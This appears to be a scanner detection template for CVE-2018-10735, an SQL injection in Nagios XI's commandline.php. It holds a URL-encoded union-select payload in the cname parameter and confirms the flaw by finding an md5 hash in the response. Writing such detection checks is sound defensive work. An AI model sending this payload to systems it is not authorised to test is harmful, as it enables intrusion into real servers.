id: CVE-2018-10735

info:
    name: Nagios XI commandline.php SQL Inject
    author: 0x_zmz(github.com/0x-zmz)
    severity: high

set:
    r: randomInt(2000000000, 2100000000)
rules:
    r0:
        request:
            method: GET
            path: /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{r}}))%23
        expression: response.body.bcontains(bytes(md5(string(r))))
expression: r0()
